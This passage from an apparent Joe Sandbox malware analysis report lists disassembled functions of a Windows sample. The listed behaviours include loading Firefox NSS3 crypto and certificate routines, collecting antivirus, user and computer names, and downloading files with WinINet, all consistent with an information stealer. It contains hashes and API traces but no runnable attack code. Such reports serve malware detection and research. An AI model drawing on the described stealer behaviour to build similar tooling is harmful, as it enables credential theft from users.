                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C4BB999), ref: 6C4BD041
                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C4BB999), ref: 6C60972B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                          • Opcode ID: 72687a3101b1d73f0ebc96109e4b8c461b0f9a936704c8f8ebfe66662ce38c01
                                                                                                                                                                                          • Instruction ID: da3e4c1dc4afffb8f542063ca851e6b5e860f3da8ae70bb9ee14222742fcb9d8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72687a3101b1d73f0ebc96109e4b8c461b0f9a936704c8f8ebfe66662ce38c01
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E611771A042108BD310CF2AC840FA7B7F6EF95319F1845ADE448ABB82D376D847C7A5
                                                                                                                                                                                          Function 6C594DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C59536F,00000022,?,?,00000000,?), ref: 6C594E70
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C594F28
                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C594F8E
                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C594FAE
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C594FC8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                          • String ID: %s=%c%s%c$%s=%s$oSYl"
                                                                                                                                                                                          • API String ID: 2709355791-1130087531
                                                                                                                                                                                          • Opcode ID: 5513683cf060674024a62a145a2e599f65d304810986bf418188cdc7b1e024dc
                                                                                                                                                                                          • Instruction ID: 355bc338ac5df20fe4267f6943da6b98215a9944734155d96e00f1b17301c7cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5513683cf060674024a62a145a2e599f65d304810986bf418188cdc7b1e024dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17513931E051CA9BEB01CA6ACC907FF7BF59F46308F1881A5E8B5A7B41D3359C4587A2
                                                                                                                                                                                          Function 0003F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnDecorator::getArgumentList.LIBCMT ref: 0003F969
                                                                                                                                                                                            • Part of subcall function 0003F504: Replicator::operator[].LIBCMT ref: 0003F587
                                                                                                                                                                                            • Part of subcall function 0003F504: DName::operator+=.LIBCMT ref: 0003F58F
                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0003F9C2
                                                                                                                                                                                          • DName::DName.LIBCMT ref: 0003FA1A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                          • API String ID: 834187326-2211150622
                                                                                                                                                                                          • Opcode ID: 4a05b5dd32305b8bcbf99ec736340f906c37c4172398ab2b7ac9175b740af3fa
                                                                                                                                                                                          • Instruction ID: 415e378390486a66d8902f03fa9946739ffdc2c444fd03c01e45ec6797949931
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a05b5dd32305b8bcbf99ec736340f906c37c4172398ab2b7ac9175b740af3fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021B370A006069FDB12DF1CD440AB97BF8EF45389F048166E849EB366DB38DD42CB40
                                                                                                                                                                                          Function 6C56ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C56ACE6
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C56AD14
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C56AD23
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C56AD39
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$ndl
                                                                                                                                                                                          • API String ID: 332880674-1800285468
                                                                                                                                                                                          • Opcode ID: 3bf96bd74cfb8bf262df037558a4ed3ae54e9d81871ffb4d61dd12e97c0e3769
                                                                                                                                                                                          • Instruction ID: a67a60484d006911f2ae89f87237dffcd436974751ecdc10be082c4be0a9e188
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf96bd74cfb8bf262df037558a4ed3ae54e9d81871ffb4d61dd12e97c0e3769
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6221F531601125EFDB009F66DCC8B6A37B5EB8630DF444425E5099BF61DB349C58CADE
                                                                                                                                                                                          Function 000412DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnDecorator::UScore.LIBCMT ref: 000412E7
                                                                                                                                                                                          • DName::DName.LIBCMT ref: 000412F3
                                                                                                                                                                                            • Part of subcall function 0003EFBE: DName::doPchar.LIBCMT ref: 0003EFEF
                                                                                                                                                                                          • UnDecorator::getScopedName.LIBCMT ref: 00041332
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 0004133C
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 0004134B
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 00041357
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 00041364
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                          • String ID: void
                                                                                                                                                                                          • API String ID: 1480779885-3531332078
                                                                                                                                                                                          • Opcode ID: f3a2472ca62c55cf3065fdad95d564475c2a666a0d0ca39feed25de8e1922495
                                                                                                                                                                                          • Instruction ID: c0f875c16e91a4a6a15d54e0d59240798907fb8b32fdc1f6b5dfd0f25eca050b
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3a2472ca62c55cf3065fdad95d564475c2a666a0d0ca39feed25de8e1922495
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11A5B5900144AFDB05EF68C856AFE7FB8AF10705F4441A9E416AB2E3DB709B85C744
                                                                                                                                                                                          Function 00031563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00031575
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00031580
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0003158B
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00031596
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4), ref: 000315A2
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 000315A9
                                                                                                                                                                                          • wsprintfA.USER32 ref: 000315BB
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                          • String ID: %dx%d
                                                                                                                                                                                          • API String ID: 3940144428-2206825331
                                                                                                                                                                                          • Opcode ID: db31709af1b398d5fe97813b4a834c1a0da0b74af1a17406fa4d2c327f81b340
                                                                                                                                                                                          • Instruction ID: 4bf0c6bef391995421fccee919c57880c9e8293104acf618af16de62a28b1654
                                                                                                                                                                                          • Opcode Fuzzy Hash: db31709af1b398d5fe97813b4a834c1a0da0b74af1a17406fa4d2c327f81b340
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93F06872501224BBEB212BA5FC4DD9B7E7CEF4E7A5B010491F609E7161D6B15D8087B0
                                                                                                                                                                                          Function 6C57CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C57CD08
                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C57CE16
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57D079
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1351604052-0
                                                                                                                                                                                          • Opcode ID: 1aa2124d25ff98538455ea4a785fe06d6df770e1473679c6d530b80bf8bf8842
                                                                                                                                                                                          • Instruction ID: 7c79d44606de6a4e8c4f24993c3428a5ba515e92964f1d8e95b69e8939718031
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aa2124d25ff98538455ea4a785fe06d6df770e1473679c6d530b80bf8bf8842
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2C16AB1A002199BDB20DF25CC84BDAB7B4BB49318F1441A8E948A7741E775EED5CFA0
                                                                                                                                                                                          Function 6C532C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(13326EFB), ref: 6C532C5D
                                                                                                                                                                                            • Part of subcall function 6C590D30: calloc.MOZGLUE ref: 6C590D50
                                                                                                                                                                                            • Part of subcall function 6C590D30: TlsGetValue.KERNEL32 ref: 6C590D6D
                                                                                                                                                                                          • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C532C8D
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C532CE0
                                                                                                                                                                                            • Part of subcall function 6C532E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C532CDA,?,00000000), ref: 6C532E1E
                                                                                                                                                                                            • Part of subcall function 6C532E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C532E33
                                                                                                                                                                                            • Part of subcall function 6C532E00: TlsGetValue.KERNEL32 ref: 6C532E4E
                                                                                                                                                                                            • Part of subcall function 6C532E00: EnterCriticalSection.KERNEL32(?), ref: 6C532E5E
                                                                                                                                                                                            • Part of subcall function 6C532E00: PL_HashTableLookup.NSS3(?), ref: 6C532E71
                                                                                                                                                                                            • Part of subcall function 6C532E00: PL_HashTableRemove.NSS3(?), ref: 6C532E84
                                                                                                                                                                                            • Part of subcall function 6C532E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C532E96
                                                                                                                                                                                            • Part of subcall function 6C532E00: PR_Unlock.NSS3 ref: 6C532EA9
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C532D23
                                                                                                                                                                                          • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C532D30
                                                                                                                                                                                          • CERT_MakeCANickname.NSS3(00000001), ref: 6C532D3F
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C532D73
                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C532DB8
                                                                                                                                                                                          • free.MOZGLUE ref: 6C532DC8
                                                                                                                                                                                            • Part of subcall function 6C533E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C533EC2
                                                                                                                                                                                            • Part of subcall function 6C533E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C533ED6
                                                                                                                                                                                            • Part of subcall function 6C533E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C533EEE
                                                                                                                                                                                            • Part of subcall function 6C533E60: PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C533F02
                                                                                                                                                                                            • Part of subcall function 6C533E60: PL_FreeArenaPool.NSS3 ref: 6C533F14
                                                                                                                                                                                            • Part of subcall function 6C533E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C533F27
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3941837925-0
                                                                                                                                                                                          • Opcode ID: 86b2917065736e26a4f8cfaaf7741d70d7958029438adcb2ab136ef415d72d48
                                                                                                                                                                                          • Instruction ID: 436ce6717d66f445ad96f39d67655a14115c062037fbf621663240445dd0af14
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86b2917065736e26a4f8cfaaf7741d70d7958029438adcb2ab136ef415d72d48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851D071A04725ABDB02DE29DC89B5B77E5EF94308F14082CEC5D83652F731E8168BD2
                                                                                                                                                                                          Function 000267ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00026836
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00026856
                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00026877
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00026892
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000268C8
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000268F8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00026923
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0002692A
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026936
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
